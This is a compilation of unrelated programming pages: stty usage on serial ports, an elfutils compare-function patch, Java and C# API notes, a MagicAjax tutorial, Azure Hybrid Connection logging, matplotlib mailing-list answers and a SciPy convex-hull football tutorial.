What does that mean? You should be able to set the tty characteristics of any serial port with commands like "(stty litout; any-command) > /dev/ttyb"
Eckhard R"uggeberg eckhard@ts.go.dlr.de
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
From the stty man page:
DESCRIPTION
stty sets certain terminal I/O options for the device that is the current standard output.
So, set the stdout *for the stty command* to the "arbitrary serial port." Eg, if dig_tty is set to the name of the port the digitizer is on (like /dev/ttya), then try "(stty -icrnl > $dig_tty)" where the parentheses mean execute in a subshell. You could also try
exec > $dig_tty
stty -icrnl
exec > /dev/tty
or
echo "stty -icrnl" | sh >$dig_tty.
mike
Michael Fischbein, Dir. of Security Services, Fusion Systems Group. 24th Floor, 225 Broadway, New York, NY 1007 msf@fsg.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The usual trick is something like:
(stty -icrnl; sleep 1000000) > /dev/ttya
Modify as needed...
- Matt Goheen
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Try using "stty -opost" when accessing the serial ports. This will prevent the line-feed to line-feed carrage-return convertion. Jeff Martin Aurora Technologies jeff@auratek.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The stty command in 4.1.x operates on stdout and prints information to stderr. Therefore, if you want to manipulate another port using stty, you can use something like
% stty erase ^R >/dev/ttyp2
Note that the change will only last for the current session, so once the tty is closed, it will revert to the default. Within shell scripts, people usually do something like "sleep 1000000 < /dev/ttyp2" in the background to keep the tty open, then kill that when they are done.
Also note that you can only do this if you have the necessary permissions for the /dev/tty* device.
Daniel Trinkle trinkle@cs.purdue.edu Dept. of Computer Sciences {backbone}!purdue!trinkle Purdue University 317-494-7844 West Lafayette, IN 47907-1398
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:06:54 CDT
This is the mail archive of the elfutils-devel@sourceware.org mailing list for the elfutils project.
On Mon, 2014-12-15 at 13:48 -0800, Josh Stone wrote:
> On 12/13/2014 03:18 PM, Mark Wielaard wrote:
> > On Thu, Dec 11, 2014 at 05:34:06PM -0800, Josh Stone wrote:
> >> It might be worth auditing other qsort/tsearch comparison functions for
> >> similar wrapping possibilities.
> >
> > I think you are right. I looked over all compare functions and two didn't
> > do as you suggest. The attached patch fixes those. Do that look correct?
>
> Those look good.

Thanks, pushed. Proposed fix attached.

Thanks,

Mark
From 6c8781d9175900e321a8afe2c5073db68872e8e0 Mon Sep 17 00:00:00 2001
From: Mark Wielaard <mjw@redhat.com>
Date: Tue, 16 Dec 2014 11:04:55 +0100
Subject: [PATCH] elfcmp: Make sure Elf32_Word difference doesn't wrap around
 in int compare.

Signed-off-by: Mark Wielaard <mjw@redhat.com>
---
 src/ChangeLog | 5 +++++
 src/elfcmp.c  | 3 +--
 2 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/src/ChangeLog b/src/ChangeLog
index 141b31f..1e612bf 100644
--- a/src/ChangeLog
+++ b/src/ChangeLog
@@ -1,3 +1,8 @@
+2014-12-16  Mark Wielaard  <mjw@redhat.com>
+
+	* elfcmp.c (compare_Elf32_Word): Make sure (unsigned) Elf32_Word
+	difference doesn't wrap around before returning as int.
+
 2014-12-11  Mark Wielaard  <mjw@redhat.com>
 
 	* readelf.c (print_debug_exception_table): Check TType base offset

diff --git a/src/elfcmp.c b/src/elfcmp.c
index c420019..d1008b3 100644
--- a/src/elfcmp.c
+++ b/src/elfcmp.c
@@ -811,8 +811,7 @@ compare_Elf32_Word (const void *p1, const void *p2)
 {
   const Elf32_Word *w1 = p1;
   const Elf32_Word *w2 = p2;
-  assert (sizeof (int) >= sizeof (*w1));
-  return (int) *w1 - (int) *w2;
+  return *w1 < *w2 ? -1 : *w1 > *w2 ? 1 : 0;
 }
 
 static int
-- 
1.8.3.1
Java - String getChars() Method
The Java string getChars() method is used to copy characters from this string into the destination character array. The first character to be copied is at index srcBegin and the last at index srcEnd-1, for a total of srcEnd-srcBegin characters. They are copied into the subarray of dst starting at index dstBegin and ending at index: dstBegin + (srcEnd-srcBegin) - 1.
Syntax
public void getChars(int srcBegin, int srcEnd, char[] dst, int dstBegin)
Parameters
- srcBegin - index of the first character in the string to copy.
- srcEnd - index after the last character in the string to copy.
- dst - the destination array.
- dstBegin - the start offset in the destination array.
Return Value
None. The return type is void.
Exception
Throws IndexOutOfBoundsException if any of the following is true:
- srcBegin is negative.
- srcBegin is greater than srcEnd.
- srcEnd is greater than the length of this string.
- dstBegin is negative.
- dstBegin+(srcEnd-srcBegin) is larger than dst.length.
Example:
In the example below, getChars() method is used to copy characters from the given string called MyStr into the given character array called MyArr.
public class MyClass {
  public static void main(String[] args) {
    String MyStr = "Hello World!";
    char MyArr[] = new char[20];

    //copy characters from MyStr into MyArr
    MyStr.getChars(0, 12, MyArr, 0);

    //print the content of char array
    System.out.print("MyArr contains:");
    for(char c: MyArr)
      System.out.print(" " + c);
  }
}
The output of the above code will be:
MyArr contains: H e l l o W o r l d !
❮ Java String Methods
https://www.alphacodingskills.com/java/note/java-string-getchars.php
Update - 12 Nov 2005: The MagicAjax framework is now hosted on SourceForge. Many improvements and features have been added since the initial release, including support for ASP.NET 2.0.
This article assumes that you know what AJAX is. If that's not the case, there are plenty of good articles in CodeProject to get you started. The code behind this article is based on the excellent series AJAX WAS Here by Bill Pierce. Understanding the client JavaScript framework and how it invokes server methods is not required to use the classes in this article, but if you want to see what happens "under the hood", I strongly recommend reading Bill Pierce's articles.
I have included a demo project to show you how to convert the existing plain postback controls to AJAX-like ones.
This page tries to be a chat application. I will not get into the details of how it works; it was created just for demonstration purposes. It uses the standard ASP.NET controls, no mystery here. The buttons cause a postback to the server and the page reloads and fills the controls with the new data.
This page uses the same controls but it works quite differently. The controls are refreshed instantly and without any reloading by the browser. That's right, AJAX is here.
There are four steps required to convert BubisChat.aspx to AjaxBubisChat.aspx (or to apply AJAX to any page using this framework):
public class AjaxBubisChat : Ajax.AjaxPage
Inheriting from AjaxPage is not required; it just handles the callback event and provides some useful properties for convenience. To handle the callback event in a page that inherits from AjaxPage, you override the OnCallBack method:
protected override void OnCallBack(EventArgs e)
{
// Refreshes the sessionID in the cache
PutSessionIDInCache();
txtMsg.Text = chatData.msgText.ToString();
ShowNames();
base.OnCallBack (e);
}
If the page doesn't inherit from AjaxPage, it can handle the callback event by implementing the ICallBackEventHandler interface:
public interface ICallBackEventHandler
{
void RaiseCallBackEvent();
}
The callback is like a postback but without the reloading of the page by the browser. I'll explain what the callback does a little later. For reasons that will become clear later, the Load event of the page and its controls are not raised during a callback. You must use the callback event instead.
During a callback, the HttpContext of the page is invalid, so you can't use the Request/Response properties of System.Web.UI.Page, you have to use the CallBackHelper.Request and CallBackHelper.Response properties instead. The AjaxPage provides valid Request/Response properties so that you don't have to replace them in your code for the ones from CallBackHelper.
It can be one AjaxPanel for each TextBox and ListBox, or one AjaxPanel for all of them. The buttons should be inside an AjaxPanel, so that their submit function is replaced automatically for a callback function. In this example, I just put all the controls inside one AjaxPanel for convenience.
Put:
<httpModules>
<add name="AjaxHttpModule" type="Ajax.AjaxHttpModule, Ajax" />
</httpModules>
at the <system.web> section, and:
<!-- If CallBackScriptPath is not set in the appSettings,
"/ajax/script" is used-->
<add key="CallBackScriptPath" value="/ajax/script" />
at the <appSettings> section of the web.config file.
The AjaxHttpModule processes the callback at the AcquireRequestState event of the HttpApplication, after the request has been authenticated. The default script path is valid if you extract the source files to the wwwroot path. If you extract them to another directory, you should change the CallBackScriptPath of the application settings accordingly.
// For automatic CallBack every 3 seconds.
CallBackHelper.SetCallBackTimerInterval(3000);
This is required so that the chat textbox is automatically refreshed if there are new messages to display. Most pages don't need automatic refresh, so just ignore this if that's the case.
And believe it or not, that was all! No JavaScript and no replacement of the controls were necessary. You can add new controls to the AjaxPanel either by code or by using the Visual Studio Designer.
The job of the callback is to invoke server-side control events (and a special CallBackTimer event if it is enabled). For more details, I suggest reading Bill Pierce's articles that I have mentioned in the Background section. When the server receives a callback, it returns generic JavaScript code. The client doesn't care what the JavaScript does (populating a ListBox, invoking an alert box, whatever), it just executes them. Thus, contrary to the usual mentality of AJAX applications, it's up to the server to manipulate the page using JavaScript, not the client. That way, instead of trying to embed JavaScript code in the web page and synchronize it with the server code, the focus is shifted on implementing all the functionality of a custom control on the server side without having to separate the code to the JavaScript part, and to the C# (VB.NET, whatever) part.
Now, it is getting more interesting... A page that is AJAX-enabled is stored as a session state variable. When a callback is invoked, the AjaxHttpModule intercepts it, finds the originating page from the session and invokes the appropriate events for the controls of the page without reloading the original page.
In order for a page to be stored in the session, it must contain at least one AjaxControl control (base class of AjaxPanel). The session key that is used is the URL of the originating page so that different pages can be distinguished from one another.
The callback doesn't have to come from a control contained inside an AjaxPanel, it can be invoked from any control on the page, as long as it is properly configured to call the appropriate callback function, like this:
Button btnSend = new Button();
btnSend.Attributes.Add ("onclick",
CallBackHelper.GetCallbackEventReference(btnSend) +
" return false;");
The CallBackHelper.GetCallbackEventReference method provides the AJAXCbo.DoPostCallBack call on the client side, and return false; is added so that the OnClick event can override the submit function.
The AjaxPanel, by default, automatically configures all the submit buttons that it contains to call the callback function and replaces the __doPostBack calls of normal postback with a AJAXCbo.DoPostCallBack call. If you want to manually set the OnClick event of your controls, set the SetCallBackForSubmitButtons and SetCallBackForChildPostBack properties of AjaxPanel to false.
The task of AjaxPanel is to reflect its contents on the browser of the client each time a callback is invoked. To accomplish this, it scans the controls that it contains and produces the appropriate JavaScript code for every control that is added, removed, or altered, ignoring the controls that haven't changed at all. In order to spot changes, it renders each control and checks if the produced HTML is different from the one obtained during the previous callback.
In addition, if the AjaxPanel encounters any RenderedByScriptControl controls (AjaxPanel inherits from this class), it ignores them and lets them take care of their "reflection" to the browser. Thus, if an AjaxPanel (parent) contains another AjaxPanel (child), and a control of the child-AjaxPanel is altered, the parent-AjaxPanel won't send the entire HTML rendering of the child-AjaxPanel, but instead the child-AjaxPanel will send just the HTML of the altered control. That way, the size of the JavaScript code that the client gets as a response of a callback, is greatly reduced.
The known limitations (the original list survives only in fragments) concern attributes set through ajaxPanel.Attributes["attrib"] = "";, the browser's XmlHttp support, and the session-state modes InProc, SQLServer and StateServer.
I'm not going to get into the details of the inner workings of the classes. I have tried to document every method, so anyone wanting to extend the AJAX controls that are provided, I strongly recommend reading the comments of all the methods and the classes. For the rest who just want to use the framework:
(The article's list of the framework's public classes and helpers was lost in extraction; it covered AjaxLinkButton, AjaxUserControl, CallBackHelper.Write, CallBackHelper.End, Response.Redirect, Server.Transfer, Response.End, and the Load event.)
AjaxPanel handles the "Browser Back Button" problem as well. The "Browser Back Button" problem is that by pressing the Back button, the browser loads the HTML page by its cache, so any AJAX changes made to the page are lost, while the user still expects to see the same page that he was viewing before.
To solve this, I have put in the page a JavaScript function that executes every time the page is loaded and a hidden field that is empty. The function checks this hidden field, and if it's empty, it assumes that the page was loaded by a request to the server (i.e. by the Refresh button) and sets the value of the field. If the function finds that the field is not empty, it assumes that the browser loaded the page by the Back button (the value of the fields are then restored) and invokes a special callback (CallBackStartup) on the server. When the CallBackStartup event is raised, AjaxPanel renders all of its children on the client page, thus restoring the previous page that the user was viewing.
CallBackStartup
I hope you find this framework useful. I encourage you to experiment with it, and if some fancy, jaws-dropping, eyes-bleeding, amazing control comes out of it, please share it with us.
This article, along with any associated source code and files, is licensed under The MIT License
http://www.codeproject.com/Articles/11655/Magic-AJAX-Applying-AJAX-to-your-existing-Web-Page?fid=216309&df=90&mpp=25&sort=Position&spc=Relaxed&select=1313380&tid=1294693
Basetypes, Collections, Diagnostics, IO, RegEx...
I see a lot of complaints about counters in the Logical Disk/Physical Disk categories always returning zero when you try to read them. Specifically, using PerformanceCounter.NextValue with these counters always returns zero:
- % Disk Read Time
- % Disk Write Time
- % Idle Time
- % Disk Time
- Avg. Disk Queue Length
- Avg. Disk Read Queue Length
- Avg. Disk Write Queue Length
Two things happen when you call NextValue. First, we read the raw value of the performance counter. Second, we do some calculations on the raw value based on the counter type that the counter says it is. If the calculated value is always zero, either we failed to read the counter or we failed to calculate it properly. If we failed to read, well, you're out of luck and there's probably no way to work around the problem. But if we failed to calculate it properly, then you have the option of doing the calculation yourself.
For the "% ..." counters, unfortunately the bug is in the first step of reading the counters, so doing the calculations yourself won't help. However, the "Avg. Disk ..." counters simply have bugs in their calculations, and I'm going to walk through the process of doing the calculations manually.
First, you need to find the counter type. The first thing I found suggested that the Avg counters are of type PERF_COUNTER_LARGE_QUEUELEN_TYPE, but after some trial and error, I discovered that they are actually PERF_COUNTER_100NS_QUEUELEN_TYPE.
The next step is to figure out what the calculation for PERF_COUNTER_100NS_QUEUELEN_TYPE is. A quick MSDN search turns up the documentation for that counter type, which tells us that the calculation looks like (X1-X0)/(Y1-Y0), where X is the counter data and Y is the 100ns time stamp.
Now we can finally implement the calculation ourselves:
public static double Calculate100NsQueuelen(CounterSample oldSample, CounterSample newSample)
{
    ulong n = (ulong) newSample.RawValue - (ulong) oldSample.RawValue;
    ulong d = (ulong) newSample.TimeStamp100nSec - (ulong) oldSample.TimeStamp100nSec;
    return ((double) n) / ((double) d);
}
This process is somewhat of a pain, as the documentation is not always good and it can be difficult to figure out which values to use in the calculations. But if you compare your results to what perfmon reports and keep trying, you can get it right eventually.
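The (X1-X0)/(Y1-Y0) formula is easy to sanity-check by hand. A small language-agnostic sketch in Python with invented raw samples (the dictionary fields stand in for CounterSample's RawValue and TimeStamp100nSec):

```python
# Hypothetical raw performance-counter samples (values invented for illustration):
# raw_value accumulates queue-length-weighted 100ns ticks; timestamp_100ns is the clock.
old_sample = {"raw_value": 1_000_000, "timestamp_100ns": 50_000_000}
new_sample = {"raw_value": 61_000_000, "timestamp_100ns": 80_000_000}

def calc_100ns_queuelen(old, new):
    # (X1 - X0) / (Y1 - Y0): counter delta divided by 100ns-time delta
    n = new["raw_value"] - old["raw_value"]
    d = new["timestamp_100ns"] - old["timestamp_100ns"]
    return n / d

print(calc_100ns_queuelen(old_sample, new_sample))  # 2.0
```

With these invented samples, the counter accumulated 60,000,000 over a 30,000,000-tick interval, i.e. an average queue length of 2.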
http://blogs.msdn.com/bclteam/archive/2005/03/15/395986.aspx
Caller Details
C# 5 and the .NET Framework 4.5 introduced three caller information attributes: CallerMemberName, CallerLineNumber and CallerFilePath. How do we use them?
Their use is simple. They’re applied to optional method parameters. That’s it. At compile time the compiler takes over and automatically resolves the correct value and passes it at the point of invocation.
void Method(
[CallerMemberName] string callerName = ""
,[CallerLineNumber] int lineNumber = -1
,[CallerFilePathAttribute] string filePath = ""
)
Getting trace data
Trace data. We all need it. How we get it is the issue. When logging an execution trace we usually need caller details, parent types, line numbers, etc. For most of us, reflection is the go-to solution. It's much more dynamic and flexible than hard-coding values and is easier to maintain in the long run.
You’ve probably seen or written a trace method like
void Trace(string message, string methodName)
{
Trace.Write(string.Format("{0}: {1}", methodName, message));
}
And then invoked it using a hard coded value for the method name or using reflection
Trace("Executing", "MyMethod");
Trace("Executing", System.Reflection.MethodBase.GetCurrentMethod().Name);
Or maybe you’ve written some more common like the following
void Trace(string message)
{
StackTrace stackTrace = new StackTrace();
StackFrame lastFrame = stackTrace.GetFrame(1);
string methodName = lastFrame.GetMethod().Name;
Trace.Write(string.Format("{0}: {1}", methodName, message));
}
which uses reflection via StackTrace to get the details of the caller. But with the new attributes, we have another option of writing that same method
void Trace(string message, [CallerMemberName] string methodName = "")
{
Trace.Write(string.Format("{0}: {1}", methodName, message));
}
We can invoke this version with just our trace message.
Trace("Executing");
At compile time the compiler will auto populate the methodName parameter with a value equal to the calling method’s name. If you look at the IL you can see exactly what it’s doing.
.method private hidebysig
instance void MyMethod () cil managed
{
// Method begins at RVA 0x206f
// Code size 17 (0x11)
.maxstack 8
IL_0000: ldarg.0
IL_0001: ldstr "Executing"
IL_0006: ldstr "MyMethod"
IL_000b: call instance void ConsoleApplication1.Program::Trace(string, string)
IL_0010: ret
} // end of method Program::MyMethod
The compiler is loading the string “MyMethod” as a parameter for the call to the Trace method.
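For contrast with the compile-time substitution visible in the IL, the runtime stack-walking alternative is not specific to .NET. A rough Python analogue of the StackTrace version, illustrative only (the function names here are invented):

```python
import inspect

def trace(message):
    # Walk one frame up the stack to find the caller's name,
    # analogous to StackTrace.GetFrame(1).GetMethod().Name in C#
    caller = inspect.currentframe().f_back.f_code.co_name
    return "{0}: {1}".format(caller, message)

def my_method():
    return trace("Executing")

print(my_method())  # my_method: Executing
```

The cost profile is the same as in .NET: the caller's name is discovered at run time, on every call, rather than baked in once at compile time.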
Do we really need another solution?
If we have a solution, and it’s been working for us for so long why the need for something else? Good question! Reflection is not known for performance. To get something as simple as the calling method’s name or line number, reflection is the proverbial sledge hammer.
There is also another issue that you might not think about initially until it bites you. When the assembly goes through obfuscation, the method names will become a cryptic mess of characters. Suddenly, “MyMethod” becomes “xEdjf3d7ldk” so when you go to look at your trace log you’ll see,
xEdjf3d7ldk: Executing
il2dur8dcpw: Executing
kf1ur8ldk83: Executing
Mapping this method name back to the original method would require some work.
The compiler will handle the attributes at compile time and obfuscation doesn’t occur until after the assembly is compiled. This means the information you get from the attributes will match what you have in your source code.
Using attributes where possible cleans up the code and makes it easier to read. When developers look at it, they won't have to decipher any reflection code to figure out its intended purpose.
Additionally, the attributes work the same in Release mode as they do in Debug mode and don’t need PDBs.
Not quite there yet
While these new attributes are handy, the information they provide is limited. We only get the three attributes for caller name, line number and file path. Since most of us would not add a trace method to every class we build, just having the method name isn’t always going to be enough detail to be useful, but we don’t get access to the containing type, method parameters or any of the other information that we could easily get using reflection. But this is a good first step.
Other uses
Are there other uses for these attributes beyond tracing and debugging? There are! My favorite use is when implementing the INotifyPropertyChanged interface which requires magic strings for passing the property names.
If you’ve seen my blog or been to my code camp sessions, you may have seen that I have many alternatives for implementing INotifyPropertyChanged including using aspects (Aspect Oriented Programming), and a T4 template (code generation). Anything that makes implementing this interface easier is awesome in my book.
public class DataModel : INotifyPropertyChanged
{
private int _myProperty;
public int MyProperty
{
get { return _myProperty; }
set { _myProperty = value; OnPropertyChanged("MyProperty"); }
}
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged(string propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged.Invoke(this, new PropertyChangedEventArgs(propertyName));
}
}
}
Not only do we have to write all of that boiler plate code in the property setter, but we have to maintain it too! I don’t think I need to tell you about the problems with magic strings. This is also prone to error with obfuscation (yes, I know you wouldn’t obfuscate a model you’re binding to).
With a quick change, we can avoid having to deal with magic strings.
public class DataModel : INotifyPropertyChanged
{
private int _myProperty;
public int MyProperty
{
get { return _myProperty; }
set { _myProperty = value; OnPropertyChanged(); }
}
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged([CallerMemberName] string propertyName = "")
{
if (PropertyChanged != null)
{
PropertyChanged.Invoke(this, new PropertyChangedEventArgs(propertyName));
}
}
}
The CallerMemberNameAttribute works with not only methods, but properties and events too. This lets us update the INotifyPropertyChanged implementation to make use of the CallerMemberNameAttribute to provide the name of the changed property to the OnPropertyChanged method.
Conclusion
As an advocate of Aspect Oriented Programming and meta programming, I’m happy to see more native features move us closer to those methodologies. I’m not sure where Microsoft is headed with these types of features, but I feel that we could have gotten more from this release. I believe it’s going in the right direction and I’m excited to see how this grows. Maybe a way for developers to provide their own compile time transformations?
For more details, see the MSDN documentation on caller information attributes.
About the author
Dustin can be found on the road less traveled, avoiding what's popular. He's a co-host on the
MashThis.IO podcast, and a contributor to Pluralsight. He regularly attends user
groups, code camps and other developer events to speak about aspect oriented
programming and a range of other topics. When he isn't working or speaking at
events, he is preparing for his next project or speaking engagement.
https://docs.microsoft.com/en-us/archive/blogs/mvpawardprogram/caller-details
Hybrid Connections offer an easy way to connect your Web App to an on-premise resource. In most cases, Hybrid Connections just work, but when they don't, the only info you might have to go on is a failure in your app or a status of "Not connected" in the Azure portal or the Hybrid Connection Manager. In this post, I'll tell you how you can get some diagnostic information from a couple of different logging methods.
Note: The information in this post applies to both Azure Relay Hybrid Connections and to Classic Hybrid Connections.
Service Bus Operational Logs
Service Bus Operational logs are available on the machine running the Hybrid Connection Manager. You don't have to do anything special to enable logging. Simply open the Event Viewer in Windows and navigate to them. You'll find them under Application and Service Logs/Microsoft/ServiceBus/Client as shown in the figure below.
Service Bus Operational Logs (Click for a larger image.)
The problem in the figure above is that the Hybrid Connection called mysql doesn't actually exist in Azure. It used to, but it has been deleted. Therefore, the Hybrid Connection Manager encounters an error when attempting to connect to it.
The Service Bus Operational logs aren't going to provide you with a silver bullet to diagnose a Hybrid Connection issue, but if you do a little investigative work with the data they provide, you'll usually find the source of your problem. Keep in mind that some of the entries might be classified as informational. Most of those can be safely ignored.
System.Net Tracing
The Hybrid Connection Manager uses the .NET Framework for connectivity with Service Bus. Therefore, you can enable logging for the System.Net namespace in order to get information on what might be causing a problem with your Hybrid Connection. System.Net tracing is usually a better choice when your Hybrid Connection is showing "Connected" but your app is failing.
To enable System.Net tracing, follow these steps on the machine that is running the Hybrid Connection Manager.
- Launch Notepad or another text editing application. You'll need to run this app as an administrator so that you can edit the Hybrid Connection Manager's configuration file.
- Open the file called Microsoft.HybridConnectionManager.Listener.exe.config located in the folder where the Hybrid Connection Manager is installed. (By default, this folder is Program Files\Microsoft\HybridConnectionManager [version].)
- Add the following code before the closing </configuration> element in the file. (The snippet below is the standard System.Net tracing configuration; the initializeData path is where the trace log will be written, so adjust it if you are not using c:\temp.)

<system.diagnostics>
  <sources>
    <source name="System.Net" tracemode="includehex" maxdatasize="1024">
      <listeners>
        <add name="System.Net" />
      </listeners>
    </source>
  </sources>
  <switches>
    <add name="System.Net" value="Verbose" />
  </switches>
  <sharedListeners>
    <add name="System.Net"
         type="System.Diagnostics.TextWriterTraceListener"
         initializeData="c:\temp\System.Net.trace.log" />
  </sharedListeners>
  <trace autoflush="true" />
</system.diagnostics>
- Restart the Azure Hybrid Connection Manager Service in Services as shown in the figure below.
Note: Make sure that you have a temp folder at the root of your C drive. If you don't, create one so that the trace log can be written to that folder.
After you do this, System.Net logs will be saved to c:\temp\ and the filename will be System.Net.trace.log. The code you added enables verbose logging, so there will be a LOT of information in the log. If you are having difficulty locating a problem in the log, you can search for exception to see if there are any exceptions occurring. Microsoft support staff can also assist you with interpreting the log if you open a support case.
Important note: Once you generate your log, you should remove the code you added to the config file and restart the Azure Hybrid Connection Manager Service again. If you don't, the System.Net log will continue to grow and it will use a lot of disk space.
Hopefully these logging options will make it easier for you to troubleshoot your Hybrid Connections.
https://blogs.msdn.microsoft.com/waws/2017/06/26/troubleshooting-hybrid-connections-with-logging/
>>>>> "Frank" == ... writes:

class Scope:
    def __init__(self, ax, maxt=10, dt=0.01):
        self.ax = ax
        self.canvas = ax.figure.canvas
        self.dt = dt
        self.maxt = maxt
        self.tdata = [0]
        self.ydata = [0]
        self.line = Line2D(self.tdata, self.ydata, animated=True)
        self.ax.add_line(self.line)
        self.background = None
        self.canvas.mpl_connect('draw_event', self.update_background)
        self.ax.set_ylim(-.1, 1.1)
        self.ax.set_xlim(0, self.maxt)

    def update_background(self, event):
        self.background = self.canvas.copy_from_bbox(self.ax.bbox)

    def emitter(self, p=0.01):
        'return a random value with probability p, else 0'
        v = nx.mlab.rand(1)
        if v>p: return 0.
        else: return nx.mlab.rand(1)

    def update(self, *args):
        if self.background is None: return True
        y = self.emitter()
        lastt = self.tdata[-1]
        if lastt>self.tdata[0]+self.maxt: # reset the arrays
            self.tdata = [self.tdata[-1]]
            self.ydata = [self.ydata[-1]]
            self.ax.set_xlim(self.tdata[0], self.tdata[0]+self.maxt)
            self.ax.figure.canvas.draw()

        self.canvas.restore_region(self.background)
        t = self.tdata[-1] + self.dt
        self.tdata.append(t)
        self.ydata.append(y)
        self.line.set_data(self.tdata, self.ydata)
        self.ax.draw_artist(self.line)
        self.canvas.blit(self.ax.bbox)
        return True

from pylab import figure, show
fig = figure()
ax = fig.add_subplot(111)
scope = Scope(ax)
gobject.idle_add(scope.update)
show()
Hello
On Wed, 2005-08-31 at 08:15 +0200, Sascha GL wrote:
I posted this to the list a few days ago:
Using the agg backend you can obtain an RGBA buffer or RGB string which
can then be loaded as a PIL Image for processing. I've adapted the
examples/agg_oo.py to demonstrate.
----
from matplotlib.backends.backend_agg \
import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
import Image
fig = Figure()
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111)
ax.plot([1,2,3])
ax.set_title('hi mom')
ax.grid(True)
ax.set_xlabel('time')
ax.set_ylabel('volts')
canvas.draw()
size = canvas.get_width_height()
usebuffer = True
if usebuffer:
# Load the agg buffer directly as the source of the PIL image
# - could be less stable as agg and PIL share memory.
buf = canvas.buffer_rgba()
im = Image.frombuffer('RGBA', size, buf, 'raw', 'RGBA', 0, 1)
else:
# Save the agg buffer to a string and load this into the PIL image.
buf = canvas.tostring_rgb()
im = Image.fromstring('RGB', size, buf, 'raw', 'RGB', 0, 1)
im.show()
----
If you are using a recent CVS version of mpl you will need to change
buffer_rgba() to buffer_rgba(0,0).
Nick
Sascha
>>>>> "Sascha" == Sascha <saschagl@...> writes:
Sascha> I am writing a web server app that creates charts among
Sascha> other things. I am trying to get rid of the temporary file
Sascha> that I use to transmit the figures created with matplotlib
Sascha> to the actual web server. Although print_figure says "If
Sascha> filename is a fileobject, write png to file object (thus
Sascha> you can, for example, write the png to stdout)" I can't
Sascha> successfully write anything to stdout. Anyone knows an
Sascha> example or can give me some hint what I can do to get rid
Sascha> of the tempfile?
Short answer: no known way to do this currently, though we'd like to
figure it out. As far as I know (and could very well be wrong)
libpng requires a FILE*, which StringIO and cStringIO do not provide.
JDH
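(A note on the answer above: in later matplotlib releases this was solved, and savefig/print_figure accept any file-like object, so the temp file can be avoided entirely with an in-memory buffer. A minimal sketch, assuming a modern matplotlib with the Agg backend:)

```python
import io
import matplotlib
matplotlib.use("Agg")  # headless raster backend, no display needed
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot([1, 2, 3])
ax.set_title('hi mom')

buf = io.BytesIO()           # any file-like object will do
fig.savefig(buf, format="png")
png_bytes = buf.getvalue()   # ready to stream to a browser, no temp file
```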
Hi!
Indeed, I misunderstood the documentation and installed only one of the
two packages (Numeric and numarray). After installing Numeric and the
devel packages for tcl and tk, the installation went smoothly.
Thank you
Alex Schwarzenberg-Czerny
On Tue, 30 Aug 2005, Fernando Perez wrote:
> Aleksander Schwarzenberg-Czerny wrote:
>
> > src/_transforms.cpp:8:34: Numeric/arrayobject.h: No such file or directory
>
> > Do I miss some required package?
>
> First, check whether you actually have numeric installed:
>
> planck[python]> python -c 'import Numeric;print Numeric.__version__'
> 23.7
>
> If that works, it means that you have installed the Numeric headers in some
> non-standard location. On my system, they live in:
>
> planck[python]> locate arrayobject.h
> /usr/include/python2.3/Numeric/arrayobject.h
>
>
> I believe by default, distutils adds automatically /path/to/include/python to
> the include file search path (via -I), but if you've installed Numeric in some
> non-standard location, that automatic search may fail. I don't see
> immediately a way to tell distutils to add specific extra paths, but there may
> be one. The cheap fix is to copy the Numeric/*.h directory over to the
> standard python location for headers in your system.
>
> Cheers,
>
> f
>
https://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=200508&viewday=31
Building on what you can do with event data from the Opta (or any other) event feed, we’re going to look at one way of visualising a team’s defensive actions. Popularised in the football analytics community by Thom Lawrence (please let us know if we should add anyone else!), convex hulls display the smallest area needed to cover a set of points:
Been a while since I did some of these, but behold: #USMNT 0-2 Colombia. US asking for trouble on their left. pic.twitter.com/JnpqlnkelR
— Thom Lawrence 🍋👀 (@lemonwatcher) June 8, 2016
In this tutorial, we’re going to go through selecting and preparing our data to create these, before plotting the hull. We’ll then apply this to a for loop to chart each player together to see where a team is being forced to defend.
For this article, we’ll be making use of the ConvexHull tools within the Scipy module. The wider module is a phenomenal resource for more complex maths needs in Python, so give it a look if you’re interested.
Outside of ConvexHull, we’ll need pandas and numpy for importing and manipulating data, while Matplotlib will plot our data. Let’s import them and get started:
from scipy.spatial import ConvexHull
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Arc
%matplotlib inline
With the modules ready, we’re going to import our data. For this example, our data contains all defensive actions in one match, split by player and team.
Let’s take a look at how it is structured with .head():
defdata = pd.read_csv("def_table.csv")
defdata.head()
So each row is a defensive action, and we can see the x/y coordinates and who did it.
We just want one player’s actions, so we’ll create a new dataframe for the first player ID – 50471:
player50471 = defdata.loc[(defdata['player'] == 50471)]
player50471.head()
Thanks to the pandas module, this is made easy by adding .values to the end of the data that we want to see in arrays, rather than columns:
defpoints = player50471[['x', 'y']].values defpoints
array([[38.9, 31.8], [30. , 33.2], [64.7, 94.9], [31.2, 32.2], [46.5, 22.6], [30.3, 49.8], [22.9, 92.5]])
Our data is now ready to be used to create our convex hull. By itself, it is actually pretty boring – it simply creates an object that does nothing at all by itself. Let’s see how this is done below:
#Create a convex hull object and assign it to the variable hull
hull = ConvexHull(player50471[['x','y']])

#Display hull
hull
<scipy.spatial.qhull.ConvexHull at 0x1faa0c96dd8>
See, that is pretty boring. But we can make it so much cooler when we plot the hull onto a chart.
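Before plotting, it is worth peeking at what the hull object actually exposes. A quick sketch on invented points, the four corners of a unit square plus one interior point:

```python
import numpy as np
from scipy.spatial import ConvexHull

# Invented points: four corners of a unit square plus one interior point
pts = np.array([[0, 0], [1, 0], [1, 1], [0, 1], [0.5, 0.5]])
hull = ConvexHull(pts)

print(len(hull.vertices))       # 4: the interior point is not part of the hull
print(hull.simplices.shape[0])  # 4: the edges that make up the boundary
print(hull.volume)              # 1.0: for a 2-D hull, .volume is the enclosed area
```

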